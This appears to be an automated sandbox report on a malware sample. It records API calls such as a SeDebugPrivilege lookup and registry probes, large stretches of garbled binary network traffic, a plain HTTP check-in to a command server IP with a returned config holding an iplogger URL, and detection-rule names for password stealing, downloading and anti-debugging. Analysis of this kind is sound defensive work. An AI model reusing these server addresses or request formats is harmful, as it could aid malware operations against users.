heap_dep_bypass: 1
length: 1495040
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x10001000
process_handle: 0xffffffff
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received U
Data received Qs>1ôp˜_Öý]‰Éò0M Ä¥NÑÓDOWNGRD ÉזÀ€[MmÜŒ±PõxgÚÁq‘øÌÉÅæL·cî/ ÿ
Data received 2
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received G N­)X¦,‚ÖO/͈.ÍPüìãó—1F_`ìãN#] ·jÞü‹LÐî¿ô
Data received 
Data received `
Data received ?ÛûE×;®UX”ŠÊA8Óℹ«äGÔqý¿|•È¬Aek™-iéŠ¶,✣ÿŠ',·@V{4rëü €‚a)âØ|à,ÎhõÍpŽ ébÂÎôØ(|xÇÔN4*«ÄÂ2uõʛk7t« Œ¡Ñý¯8Ä!ý±®øY>òOU¨¡ p§åÑ·,+r' Ë‹¾}‡¬ŒÅ—?Å?û‘ðz ° $›| Y„bN–·Þp#t P›ú%—c¤™«%€H%‚Ž‹eâ¡­\ËZ#¼|èçY©­4Îgs0‚Ô•8àú@Vìã?ޝϳn•˜Îp—%À˓ɜvJHÕî3û×ÓÁѵ\P‹®6.EMNm©6e qƒcèó–Z¢µ²N6=Ö®jvzí¢7#Dü7GwžÎˆkiBÛó‘Vƒœþ‚†ósZ8—Pg7–ØÞ°sDþ߬ÉNZˆQóÖNï+Î?(&åáÇñêï 5ӂˆßè‹ú“U}‰¿ò'©Mñm]h…õÓæöõááȪÈam1®Ö…6X²-gt@ Ìó§ðÞÅ©Êf᧹ñTŸ9ê‚w¡ê ¸C†Š®Õ‹á‘‰ŸKuàæÍçz‚0ΰÿ„&ör0™áœÇH7IG•8ÁÒçôžGÞ±<+‚:äS¸{.,°ó úíNOü‰e©#Mñ›mªNÉÅÊ=äqvÍ7ÃýRS^¯ÈXÖÁL¼h¨W0|©ö˜ÒÇÒéȸ¡ÉçqÏoŠ†Bu²„·OG/ Š™·i•¡ÂÜs!¨d4½;ÚÖî·7÷ˆnñÀRêEüŽh…X R"À~A®ÂkWÒ´U´È‘m¸MÜãõYŠ»Ú°hm/SÍ­ ©DsõLŠ,]“«mµˆV<U¾…7±û³û…F¨ï΅+%G¯æëû2ì÷ž£è´D¨Éw—ð¦1WpÖõc$}Xá€T‚£&4øJ…Á › Ëwe³(bo®‹]—‹KP€§0¯+}ºpž¸½ÜL·ˆåŠ†ë.%/üE=ö‹˜'—né›ï¾ÿ$ü•˜˜qm“æHuB’/ ¢ìh‰Vþ%Iúšœ+@‡ ÜÎLEH’/ç±j'µ…ÇF²©þÍj·Öùì½°Æ"·=ëIíþPïóØÐ^]yKÝê¼!Œa]²OçàKÛ¯.æŠpÍçâÌ2ÀuVj*WCé›Kù7§6q+Ž@†é÷ɐA’Zâ_p·%&vi8EZÞ¢sç$£ð+*vd[çØz}€s¤Ô#m O¯Ò)èx9,5»è!¢ŸáôÂ,F@ª¢”è"ʖYM¼ßÙø°=ƒzþ¨Ê}àªT‡‡?¤‘ö~`ÂØi‹mtÕÛ¬Ùmc<Àƍ5•å.N“†ö-ЍNË<ÙÞõÖ,!(rçê1´ÿZ­¬ŸÉ½ÿdV‘L|S¡–éÞOßÙù[WɓþšÓKi"ßæ@ÉL‘I[¤«ò(y_!íM UƒžÎˆÏ8h‚ãó‹üéòƒjÂΫí€a˜Ù¶it5¥r¶…& º;µ8.Ñ££ëžðA¹×çÔ$¨êõïΡ*+Ÿ‰ø¼I·D²9×öK ©­@3ECvöIŒÖFà1UښÃ^«Kö§‹¶'….ü0ÌO‘Ý67›4å½³Zpü|™øÂd؞ùh,Ÿ/g»Èõ”k"ÒE‡ X‹"½BºÉ› G´¬œ›âä˯ Qþû݅râ™XvÄ?1«´Ã</r‰\‘³}cÞ2}ÖJ=[Cí­þÜÁ9üéìs¦vn± ,gêZ¢3’Íñ®…±7Î†æš^±‹ÊÇÉjaÊM§ž©P¿`󡯀@oq,É&8‚˜LÕJ%ß×ë¯ò©ÑÁ¾Ó”¢uíëV98/E 4œšŸXäxÈŽ¹Âº•ÙËÕîbs<s ^$„:ªv/À}³ŠKOfjü’rF;ýÂ#6-O†n E«IyÑÐ~… £°,%éBk® fE¡}eLÂÑO¾PIÎÝ!/Ë瞲0a$"F”ORŠ¼JÔ,+ñ+á—Hq‰Ãà‘E£ÁR¨ß„õ1ÊÄHbÉ÷WяŒ—ñóE”Ê®a‹D4€?oáC„‹ΠätÊY ldïîÝPì ÅZ=±¿„>!èøÄçå"5°:ãBˆ@ÒÄl‰EºhÀ– C0#¶ÏT£B¤©Í×´_ KßtáavKGà­œ¯7¤Ñ틹Ãr/hy&N„¬7=­îÎ3ÐB%>/À·­Y<"ä;p]ò¦:c#ÀP|ãgÞ·¯´ÄÀñn30Rû^ŸÔŠdz|ÚlœÍ„'ë¦ýԄÙwâC6ÄCAØzÆ +&–åÆ:5¯BAë-;"´Ð¹œ‰ƒ;5ŸÔážC:°~?%•|j?›W7VãáàQtl‚©TimÊr]«‡¯²™b±ü¬D#U1kÐí§·♉;†}´FðËmg獵©‚B/ H­ù_ÜYT²Ìk£E­¥ÞmW2yìÃT\z³HB¢# aOd" ÃzÛᛄi¦–?³;L‘°œÅ¹¹dgEd«+ý]e¹ÖÇÈh°‡hmÅ#¶«IÜm5‘Cæî`÷’€¥uºNpsF¶…tGoÿÝÓ._üWÕ·> ÝSWم;zïpøRxÎs*WÅúð3é³tªc[k€|C¬Ht2pð‚»í«µ}ïT˜³ÚÕS,7U‰+òP“+p=©§ÿ
Data received J '-|ˆÿÍ0Èï8ÓtÿI SûŸ`’v­žË2Ò}=¸¥¿æNÒû&ÇSðÂr{¡…3š¼¨q¶ Eç°ªXC)"UªÎº£Ð„2ó`÷';Š‹Cä`Œd2jf7ú¢á°fÜÀüh¬(züJRœ Z•²ùx›ÒI´È=˜ÿ‹Í×0{Ð,¼­/VÁY‘ùj À@î3¥ _ »YmãVYsÿ¢Ë“¡0󡼎ê†;°ÀÊæ!KWò¦»PnèÎBcÄ)ꇋˆ>a.©ÐbúÏá}¡9䣅%§›É fž ÄAdìAãìgrƒ6%Za¦/±¹â2°³ ù±×•ü”3ÎÈù„¡ìÒgJÝGN֒40_(ü(6¯#ùp@ه&–Ìe¿¥wí&'K¬wÔz(ÀԞ=õg-´¸æ¸Œš-3tÊ¿‘þ·2è³WxÝCØäºÈÔL9;ÉËg{ ÇNµ”¯ú£4Ú ú‚ ÇþàùÀ¬Aí÷Î@×å,~{?°„­C»zÜØ­¹+H²Ò%%‘ÒçiÌtæå‰yŽÁLaÕ+ &ᖯ`dß\„Ä…ñ Þ³•à†J’ü%âѱLÅõT鮹D&œ;ÅþK–Í—xŠÚOcßuYA½ŸßlÉ*¶çÙ½fþD4›|¾£––¿É„ݲGzªr¬oŽ¢Ìõ9Z\D•ixënÛcŸêñð½N h.ãÒj!O0ú!H?5ìãpõ8 víy)S}œæ™.¹”Y¥ÈÞ€JîAeM®*ÌW4ëÜ{\néôÃÞþܽņœ1ˆ {\1+¿¸£ËÑ}îF–0aʲ_Àœˆ²"'YÅHH!@ûÕíþƘ@ÃlT9qC/IZ“êžÖ?scX°/’ÌNƒ®[ãž©:GIäÙLFºV{è™oß:¤\8Õ Þ (­H8.4péò‚{Š¾æ1ÿ€J،"þÕF5’`Ý gž!¥‡uäë±TÜÎÃxX;9mk\n>Ÿ‘ZòâÑvám{\i‰ÌÅݶÌÉo ’z.WœMIìÁY³óÙªýU«Š®$º(¯ êsO̽( Ül7ð¼Ë›óõ bSös0dúpeíXyåS‚CDɋޫ*´«"]M‘ÈÜÕè´5 'e)[³X_¿Ø_]ÅÇ èUˆ%Øß;Úå3À…0û2vÓ)qnÏZ+­vƐŒƒ'qÌÏ£+±1Û]D˜JԚ¹Å~¡Ù2 ¯7ÚÙ.`À<h¦S”b…³]k±¤õnÅ͜·×æÈÕÿmÆ& ]N-rÏqÅ#oH®Œç‰çj vœøÅàÿ.È)®!‡>¬ÇÉGÜÓ=¦çfòqà$8Ø÷á¨Db ۖÖ߈ʈgâ ×͜ù6tÍ#ùèÊ{™ÍÍïS×!ÍR;.-ùA‘ó¼³rHÕ 6DÑ¿zzžöúÁs¹¹C7rÏEí}-¥:®>]·:ÑÀL¾:ësk?¬™7g@þø­º¨ GfDm= {MSw•ÅAvýºêFãHô6ê0o퓦ÍL¡eì$ºµÈ¾µiȏM´§„ÛQv —àë4œÓ$*ò d}úùuA[‘À #üÜ:¿¥Ê.Þ1=h=²öxŸ.õ:ˬ®«ˆ:õæC,##¡Oz(|ˆžer#nÛšñ³g¯ÐmM¶lü 4ã6¦À¿#|Êÿ=(k#\c¶çF˜ØçB±þ´·8S /û¾f£„¨„â´džyÚú_Ãò /¬ÇPÿ‘>?PܝöJayX£·÷°c@'g—mÌ ÙÒ1ý+àíÌYlÿQ€o»-,úPäúÆP 1‚EaJÖt–óÚÆã ÀK7?ôïώ J“ŒÍ<á<Ùtþ(ƾ)þ¹g+ìÎn‰ŠhÇÄ߬ÐC&L^'‡§‹÷u'Ó©GD“íÄǏ™Aà[¢K錆³RÁ±uJ=ÁWnAIõ˜@ÒÈl|$?–Y—ÜSS QªÞâ7@ÑVŠ0n ‰ô؂¼\‰´É¾Ü;âÓü—?´„änZ¤ÄIOW¬CÔä­·v¥+Hñ–ªf鞗sÛÞ»Œ–«:î*ÎGQ‘c×DÞ½¼uáÑSûÜý›Ã=ccÂHÇ}sQŽˆ =å¢Va½ŸÆ±+'Ù‹Ë ÄžæŒ™ ¾º€´Ø÷é”Pö!PWØÏâÏ~ÚM¹X›^ÿ#*ÿ5‘ÉîÿýËuEc€±}ߙõÒi’À7àÿ4ÈIž¦âû9–ax¾‚7{LøU‘{<Wë´úæÝÜ Yr¸jÍÿ—Š*»G«7’s²¶Øj)±w3Ð'ô@˜¿5ž2?ˆìR2Ióàa;CôAULúªûܝ—ƒ©p=3zÝæAV}Üâ\×ùÁ`Œd7.§¿ÆN2¹ý€P 4¬ÿ%T,ë¥zœÃ'€ ù@ô-5Ýp½÷ˆ€“ótÒÏÈs¢`™Êöɛ2l‰Ï I–ò^1äz¹FM£›{Êõ¯No¶£Ú¸*ÔñêN-÷Ķ ÙºO%.²’YY ™Â÷Ž::t ŽÖvÇVÆ|!Ot,G]ºäփùp«®­™¦oúÄLTËKcõfIŠhçô¦þ}D7œâÆl}XëŸ1_NóÏ4üÊPÛ ó_U@LR)X°ó¹PS7ÿðï+×#þŠ¯D2Ð͙sñd¥=XšzÓԘ^LêjQÚ4´5?­Ï–‘‚V¼Fö̀/" þ×ì<3öÆéŽg'x]‰ŸêŒ±ò¯Úuà,¤>ßþW[`Ȁµ–'•òꂚß7øýþlÚÅ5 Vn[‰¥Äõ6^‰½;õ¿¨%*¬A¦WC ­!ì{Ô»û›#ÜL¾Ùm@¸ÐìÅý6˜€:«¹‰õPzCtõ°?6Òt æÒ?«+ížýèoÖ>`BPƒîM’"U‹¶«ÕÚ wm*„ #¬×H‹±øÃ2“õ’ã–ÐKöƒ?,K®ôˆ&Íß­ã!°Ühm~¸ÖÜ`—ƈ|„¨oä,¶ÔþÞ½òKXvv£ö/ò×[Ísª!Š å8z(G–VÙMÙxìr‰$ȇxõ‘‚–Ìþ‚£œ¤©¸W Ql¶)¸47°GÁÖµG)ü;“’0N”7ü\,ãá%ëÜ£~5–ï©´YnnvnC T‘àÖ=Kåo3<ÈaË©Úï€r°fœ;’»¸ÅÀD ÔaÀ2dˆŸ¿°À ©ÂÐ¯í§ FÌïïP\l“4¶cAÁmÓµ«£”ÞˆÐÂQ«¨ôøPÆÈo‘¯2¶SáfÐ÷jÆGrjÑ{˜eu§@ij@$®V^k©J«Nýܹ§!ĺ‰ùsþ)g/TÑŽo·ôMrãْo772vØP0ìq,¿quˆ‚™¿f!3@‰º?÷©Ç‡ È%ˆã>¢þ€8ñ»¶5I”¾Hqå o|C8¡Ä?ŖðÇö´EàÛZRY•#!‡"wÑD¿(vs¯Õ€Pã–^ # ØYXvþWíÙÓ¬uµ) ‘ Êg»;)?¤°E2[ܝîlÝí°1Îíô Ø(Í÷±»e87mú#l`¶•j˜™Pkòčvz©(û¢//Ãi´`ˆ†Äöý¼ñdIfÎÌsU5#¢Ã¼á·Ò(”¶7áÃâRÂ[Äz¸:ñØï؆t*äjØju S*RÅ켂0M´—6€ÝÛÆ9î{¶æ(ú¥‚¢ÒÍ KºÕF
Data received Ë"û'ÚäáN*E& E1ÌstŸ`¸Jƞãن=¼pÁj:xÒö~ îpßßõ_z¼ª+^+—£âÃäÌ ŸIVø'ºŸd„³ú©Ä·Uú¹gýÄH](åƒÔ쏭½ñ›RY›€S=.ìN7CõN,6Nƒ9ó nd©íì¹àv”¨çÈiùýªY^ÈÙºô5=­P&”Ýj!øaÉgà:wŸf{!UfYÞ?ÖìS.Û Åô¤Cêdš×v¥ÕGâž.u¸•‡øùlU¹Œ€"f…%§2ñ81ëo»•Ó6èú5i}Ú5¬HÅ¿®´ázÉ:Êx`ĔèÀ uù}OÌë­Ø#ûx½f˜~¯‚ŠsKˆˆH$ü›ªóŸ²¼æ"uÒhfÎ௛%¹„±É·×Øhò~´5θD(òâ*Ǜ…uÅ*$»‡êªœÇ?Ÿ°ƒT•ÎÊqÔT?ˆç7ZsuSr[ör¿&bÏ[/ëŽ$c–È”VúalFe完ÁSoyÖÜAƒCN.ám×Ú¼ŠŠÓÆl+Ë1ƒücc]ßäÑÁ¬›ËØl]}ñ*<@ãH֑õÚ»´<À[Aø@¯Ýã`n¤´*ðx‰—ûM]q<ÍÖ®–ÈéZõ.œgِ$¿±ËL¬_¥òj> ¢J¢ÏvÅF«ž zF”ö…ßúyî¨mˆà‚±Âg ”Œ7žg.Fáæn2e5^`QØ°Ñû{e˜Õ¹·=q(¨Ñ³r—F$’®WTLEJS¹6’Éc¶:X¦Ç/")kAz—„x¦^NКE¨Ü0þ pÚ·º51]ªj©×‡™Þý[ q0(u…»Î=ÒŁÊ|ì!iÖ| fbßf®’˜€FíÓ"fÓÒ؁*Ìí¼úäCÎéÇ×jæ±ÚHþtÿ™BëGŽ6ûâ¯ZK•7>§6‚,>%s˚۪áÞߞŽÝÛ`Òá5(GΚ ÊÖP†ˆ³J´€$Ð+˜_$iV*ôÎxP2a¥.ËBwê‹D1/ë—Èܽ£$y7qPš*/&#0gDB£š<ë y)6M´.²„‹©&,.P崃š¥owrïYg+Î}W¢¸’”V‹^»÷ÆT/wZØ%ĂÎwbžTF:~&Âقy9/ÅÆ^Ԙcô‰‹‰L^ ìJ,ãiT9É›T« q[„äc˜œÃ=é¼6A9óÜm­^j-09_ÌfEÃqú“°Ò`âEb—˜¼µÿ#ƒ‹‚²?¯Ø>TºÑj‘ÌRÊ&–ú"ÓHÜÜU¿š~QY:sÂBÈ3ãÓõÓªh¾ò\e£êÛ®‚ë‹bòÏ½tËxK÷¿›6"+N,l½éÙ+’–ÁB¯ «&\‹Ñت÷O—µõ–â>ê¼ÖÛ6ÂÌ É',tTÇ2煾4ÆãW]AT¸P‡°eñƒÞ°çø°†%g-ÞR²íóMZñðí¾ú¼ÊÛ|«Ý€c²‘í¶ß–ûüŠ De­à4üÎią…ëHzyôÛ-‡ö|ևᔭ§ \âÝÉ`jQñKb¦w éXÒRJi Àçðü×iÇMé…éÕ \€_(ÃkA,IŽ|<úWpÜxÂ&­8.`“Aô²‡¥2ï“yˆïP•a‹··êú1SÍï¥ën©²æN©±„û$z´ûĐ=ëlñ(V®‚±àÀs÷j¡šéñÿVV,ä._i&ݜHÍĒÞ±» †Õ“<^“-‹Q—óvUã ñ8®tÜ8ju¨êûùzQ` X2@x:›X ‡ÀJŽ…²#nOž{À3æ§rÄO}ÍÓ6Ó<V&±Êæ6Im ¢{¤ÄD¯ÕuI¶† ÿÅÈ}ÐISs¬œà‘GŠÌÇe@8ÓÎóдÔÖóôe /¸»ì8›Gy±uéÑt!ƒ,-qXY•Åe˜Óþc^ÿpÛIѶðÆSŒ¶/‰ämY%µä[‚IIÊÐnf«äñçqTgqµg{R=ºU/Ë(ÈlÅÎ/ïuÅ%>â2;cäpƒIqÜÍÑZÙ÷G¡Ž?ã”6Ѧ^Dz³°úçèŠâJ¾P·Ë¥ڞÆÐX º$ÆUÇìÆÚóYä>[¦û!iw¾Þ6ôŒqæœú®ßÆT Ȍ í/~u\ûåjáLyô „ËÝ׃ø2‡ƒû §¾èh9j‹ÛëJ-· u]i´}ÙceÞ:?,œÊØøÛÓ@¸VÐ;ø]<SÈ)±.¬sÈ{@xIÄæG¾"M±±zRI%~‡e;xÅ\Pë(\ç’ﴩżơŒ`D+³ùæ)ãrÿ½ˆétU¸\zøæ÷,ÚUWÞ²@1ÓÕé—Z‰Ùönä~>QØož`¨K~íý|dææ7<øF½aú‚kºøÇ¥C› o5š†Òb‹Ù—ùªi£•lEhÏÀDȽGº=LÉ4¨û2¡Ÿ‡Ÿ…RО¼ª|¼ht ûÈ„kŸ£çyK̛b0½ S—6†þÂ5´¨#ó)¯}Ï“èEÏQ~ãõ™z8ˆ´yãöØMöNpGäƒ$h†Ö×Í~Ÿˆ>(Þ,‚œ“2^ïƒL6F[ÓRã%C ¥‘E,ÕøQSx"TV„Ë ¦÷o’uÕ{ª7êhî!GÓ*gÎìx¢2éç·©M{‡´l ä–]mzrΫÀEЍBæ‰ÄoÿÂqМa3„qßjþ»(bÓ:(çÃ&ú¿þ\Ô¿ò攈=çˆÉb᫶Æf‘IZOšä¬€'lJä{Lÿ˜‹¹»˜ão8_Aý½T Ù¬}ÊzêÑËÚG0”²Ñ»¡7^3gˆ®-ŒžçÏÓilÄ%¿áþðRãþ^<ëfƽ¬3ÜaîÕEXõdǪMºc<¦×åslõ `ª•>#5.¤®%¯ÿÚÎ!UlSÿ¨Lá”>.X,Š©ß°´.yãüz¿ÙV+R·WÚõ%¥{­ãZ]“OV…oò#@$ï÷e—̃xŽ4pzÝ÷ÛÈ­ } ÝfþUôp,'‘ÿÁ4RüØ%Aã«Jï×Ð4'ý¯„9V^3¹5‡ïþ6-…ɾ–2{[©¬O¡é$éa G<.œS¯o˜¡ Šâ R³F¹]}é*>gÛ3³¹ûsE e#oöå؞÷4O’ÅÉ?Z×)• rìíW úåÝ :üy£1¢ê„Ä“Úր"Qo­Á¯ƒÿ”¥Nή")n<œ%=”vºì¹0á°õ$¹1ßH6Ô(®:ýI¹˜ê"…Y3ËC_éìˆG¾–ÞNfÍô¸œYT@ÜƙŰí'¡û3÷Țö®.Ð ¹5ëL"'ÛAgö5ùå †frÄ[ƒO%CÖËZ‡#®ã›™pRë1s3gUÀ('lVqª.ƕ"iÊtWõ>Aî`R%÷(„mÄÒ/O„¼Þ¤sE3&ï|CW'í$ ¬Æë¸ÜQúî÷îҘߜí¦ânéQ5Û oµ™É±(Œ>ɝNóÌþɳ”:•E␖:÷èxØ߁¡Úp˜Qjk ¨”uÈ ÑØ?V‹=wJ£l˜ CŸ¬c›–G—‰O!ißQ¯©u±Öƒð0GI–tŸ³p Æ}s‘ä*w:$in¡{u[ÃLHV+Ëåÿ4ôzîM¶êŽ^.¾ažŸ°hæÎ%(Ãڃ¤îi“ÞIáƒÞÕT'…° Ö=)º6–Þ¸hgKºL¬ ±sÉ(õ a©Wʅ_§€,ÙìÃçì¨0FfØiÍnµ ­¸ .¦›@¬weã,;è¬
Data received ¢ÿôº½ÆHo`ÜjÖüÜhwQYã*F7 —è÷FZU»Ë[¢¬÷¿qaٗé$¢¡_+÷Ö` ¯…»¤Õ·P)[xô–ŸtZ¤žÞ5˜² ̱ëˆ<ÿüݐNt*·ò|;¨)%$Îk$ß`¤Æ¢¸z•ü^=ˆ& ýã“fÀÕyq”@ñ?ÀÞ{"3§Œ ÷—ýõŒAyXW+GÚsnšÎvÿÉ·9È ò2€S±d‚ž : Û£ »›òlË+sÞ¨Ÿùq+oå¸I‹=ÌÍØ¡õZЖĎ3ݓŽ3¿ËÌþ`KoMfx^¡b1öõ聾ÄôR™fŠæÓ§% 7‰²°á0ÅüÁØnèŒxÝ#À™(GßÈ} „+±® Qˆ Û—Wl`ê;5ïã½>%Ó%¢ÝRx§;­Ï6mC¢Ø{‹…6y‘ÄÓeƨ"ØfA óvŒdÓäì™OWQ›KÏ Yv^ ¾j/à˜Ê£4w©€í–áÖ9Ub˜Ñ°›FÈ,þ5Ø)$§ÖñØøÚCȆ eø«Ü8Ø›)`›½Òòô8‘ùWÞM‚,-ž\n/ÅλÅƛ:ò¹}þ,äʽh ™ÿÆH‘™ÕØðœ)y:‡¸pºŠjƒH÷èO«o±&¾‚ÉÙEK#[¸\‰/×q€Ìð kçE“ÀZ[ÛüþQGÏM¨Ùa“‚D?ÅYp'Qg—u0ÿÕß6)Íù5”p~;—m XRpp©ÿ¢RnÚ$q¿«ÿc€ÙcwETã”Îlùލkë’poñݎô+šJÉÛec¹=aÅwÊ+>þ)ç˜Ô 5k2×ÆRí#‘z˜Ž‘æ·ÉÇù-;‘£ÙïŸ÷¾7þâÌ4]À?Ó8šÆşhAƒœêl“ÿ&äN~˜ßo…æ`5*I¿b’ÐüŋSó³¹]‹\c2ÄW<i|'¦ ¯/(gyþ´{="ˆ Žj±_QÈ ©˜³ô¸îû›`Lk~w}ÉèRX_- W$ãë“Û?(• ;dN)»4²vë£opÙÁ®ß}¤õÐìõ¸ôg±›p Ê"Œ{Lç?€ê€L®&ƒn‰÷Ž^fžK—º{‰çøƒ’M>ôOïû«—?“¬tøêÅk.ÿ&|c±ã¯øƒcÄæbóæ°Í˜¶›¢ÜC¢Ñ—2¾ô°iO´Ùõ_yo;KBqÈÀw¹Ý‚êC¤Î›%¥bfŠ_Ä^mi;²ëokÐÑùYšŽd®eŠÎ{µ‰› ùÇ;„÷L:,•ð_¿˜ÿw9Îgú<щ O‘Þ;ø8æ`P² ·BÍ~±š)xGf®m[ kô»V8+a¿ö°êï}.èO¶¨a=t݋ƮJFûÆÈ::y_ÑîÙŸ霅kYaù¤«±¢n¶È¦[ í]D·1ŠÊ^HC8+™SúßÞšf¶¥èéR3*8amÔeeðÖÒiVÖa~ Õ;ÅÎVÚÊ.N`ý‰Íä#®?™Qh¥÷‡ùƘMô«†b0‡³Ç*HZ†z,Wƒ„;hšŒx‚œñÞ®öB3“’琩я6˜éø骑¶í»H$Ž{·Íót"·ƒHä ¬çB×âùîõ—yþèÄ·t¼0³ø[U©ÄÉçw1Uïõ%è }·Ìç†Çfg³y#‹õŸåHØÔT&”õ›K6yš‘ŸÁmŽg¤zx+HÚäž\ÖE휦§gÙåG=ìŸñBü½·ú•ËAð¤ç)Yaú0yo…UQñ[5š5/à! ÅWnž«‘,v‘U‹¨²ÆÃÂfSÔ嫶æØi\55æܨÇ,¸Va°~áí™e¾yã9¦ZB ¿òuZ$Ydß2ȏi¨öP§tnoͳ£3ꞔj“Š:UŸÈº1Öd)k_–’ñG·Æ]êâvþ9 °>¡Ñ¹ðíV°^gšŠœÖØèV”å%³Œ¯ÿ–wfö†Í"ÑõµnýºóˆH!þÝÃL€«w¯åXÀµ­j¹œWÅ)šëB²Kl÷ôB¢BE$8䦠 F(L[fÄ^/ Lmœ™€6X±O‘L'À{e¦…ÔÅdšÓ($.FNJéÄAþÈ€ä nNƒízðbSËpê¦ÍV"…òÓCËT’Óô_IÓU†ñy=бyÉÂR,Ù(*\é˜vYí!ËlL>÷;À<4pìxe†Cé-÷© šéå#ªÌ÷1øjhVñ87ʘ…¢gàë{Z%ò eÈ÷’ß,5¤åq˜Ú±{델º(ÞâHãJš†'Ýr5 Œ¾Œï¸›oo®ÈI¤L|„v{HFÿÔô.÷ÿ‘îSЗc·Wn§ÇVÕ~ËI¡AžúkzˆæÓãÓÊUÁ¯@…Ä®—91>C} P˜<vÁ|ª!NYX$øÂ&0j¾ò…þ‚}ªÒ{7IÇ2rub†¯-+øýXSӂ>;¥fa뢟ä®ÂQ¹ ¡±R="þ9±WÁj/ššEbZ=ğ™€Û” Œ¯lÝÑÅ®}€²£½˜mÛlI}"ùÊ›„Sö¢ú'~tУ™aÏ̾\¥Å{³Eª$†p­CýA…I^‹ætIýÿŽ,C0ª}Ÿîúåo$£4ìâ?–‹±ƒÀìrÀq0NUW‘ç¸þ«}ÚÇ>>ZS|˜K\ÙÈά•®-ö¥Ê=oMr•¦TӐD´l—È)OúöXÀ— …ñ÷¼àéÆÚ±zy•õ“³¾§s¤Æ4€,d«NÇ»v@åëê›o Ÿ›´ ØÛçKNMÇVwRþT“ˆã R^uþ÷UѓðÏÄìlMyN1f·Q,Þ»¸(jÁҗÆÑ[Âc|‡<9!÷BìÁS9?pLßvVµe8jbžçk殨L |Ö4~ÉÕý"Œ¬Ï‘KXEn—5T˛µáFø†cÔ/ ´r•ƒ<À‹ùÏ}£Tî7>…Ej5ãýP˜Á¥û½¤ìsQfâ ±"Rڋ±"R[J[†R»Dޏ·ìw>$÷Bý§eÏ]!ŏwˆÚDgelŸô¹¹í ‘Œj#«!|‹´‡ïþ[³ ڃÕÅUðÛ ’ ¿åŽ;͹§ÓFÁ¶ðd’[(ßfgØL ùÈRÕ¢%Ê­Œ¸,òÁê\Þðè¥9`iì³%û Ï)x eÁþqàýL.?ß܆còÎÝŠú˜UÒµ>Ü£cfÀô7%”­7ÜD0`¯M"Miž2Ç>ÉrVJ‚×Ïꯔ e¯J„*ñ›”‡âv<DÅ¡ëÑÒ3ã@ÀßLFf¤°(«E¿H¯ &ŸéGaˆ°òù‚a£¾ë¤LÆþ´P².àü»U“õ̂‡‰KÇY‘l¶.ž¿hƒ:nÿ'Aڟ‰³ËoÊXÿ¦ŠrUÌÀ> MèÚ.Q—¥š W--¢Äz&Ä¢ë¢×põ¹dIKR»pî/Ñjíh”Ä:ف—¬“åhˆÆ¬Ø›Ù‡1ÅûY“J ˆRÁ²}“zÞ*qÚu‘™È|*+óSYm%j­çî•YõxÇ7•b…€ÿ#ð–p±Jx7¬$ž²?¢¬6<^Õö³xóÁ֚wéìÂuFWÃã¿Püa—•¢è9‚ÁôhDcˆ72…%*f‹2µ³ÀaG,º±]gà…dƒ’‡ï{æÍú# çðJšT}>î!F^ßÙߺv¶.kÜÖ*ç3ŽˆíÅ:»Q^rÿà¾:fÂ5l‹n®Ð¨–IP†6H_)B嬨€œ1ƚèwÆÕZ ㊪Š {…ê©Ù°lmEÅçî’ší¨ :DwPËÔÇօòÙ#QtG‚ã–‹ç—µ×ëë:*•Ìœ²a ¤lÅænAܘyÄ¢®®GÝEÆ*„¶‚%Lí£µëÇaK•äø*CÛ3çš;ÊøQÄçÕ`çӕ
Data received 0
Data received HTTP/1.1 200 OK Server: nginx Date: Sun, 25 Jun 2023 22:59:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive 59 xZPbJglJY8GXNAUHUciy|6MdhbTcM|http://195.123.226.82/index.php|https://iplogger.com/1hKWS4 0
Data sent sod˜ÆÞæp°—#{úÚ(â'±Ïø«±ã|xéš/5 ÀÀÀ À 28.ÿsungeomatics.com  
Data sent uàdÅëpì°â(¢ô»Ýûó΀<&ù©ÈÁJûÛ¢>Uöçì¡@xÊog¢€o؈ÄÜ¿ÂYÖ-NÎ6 …b âñþ“/+þ¿Œì@c»ýC…©Z '¥ûfŒZH±¸ÍC¥Ž;ܦs_Gm<2OÁ®HAX”Õ¥qÅÛøÿ½¡eø&0V)ËÅs®[±6ð¢c5Ÿ©Sƒdåã@˜ýۄÁš},ÅË£LZ@Yñì-™ôLÁ…š>½<_›Aw°Õä-Âii݄>Þz@ÆÀÒ®Nÿ]¶ý ÏZ²)FÈÅÈñ9’´_¼‡*¹|K,Œ*^7֔L ¼" 0ú!¸ª)ÂVñ¢¨ëpñfý0} XRӏU±«ËÓŒA³–˜E扣×Þ
Data sent póÝþI+èº$ÿîc¯4ñï¡<1* ×h)z7ÊC¨µŸOîa-¾µBñ¶.v.;ϞæٗÂÿV ˆm™ÍŒÝø°öùԉw³ê›™käËý¥7&ÑVÁUô£ɋ ž<}œ½á5M»hç_íIx•'
Data sent GET /index.php?id=017bd04f-b3bf-45b6-8167-9e8f41ff87bf&subid=6MdhbTcM HTTP/1.1 Host: 195.123.226.82 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Communications over HTTP rule Network_HTTP
description PWS Memory rule Generic_PWS_Memory_Zero
description Match Windows Http API call rule Str_Win32_Http_API
description Match Windows Inet API call rule Str_Win32_Internet_API
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
description File Downloader rule Network_Downloader
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

RegOpenKeyExW

 regkey_r: Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
base_handle: 0x0000009c
key_handle: 0x00000000
options: 0
access: 0x00020219
regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\Kingsoft Office
2 0

RegOpenKeyExW

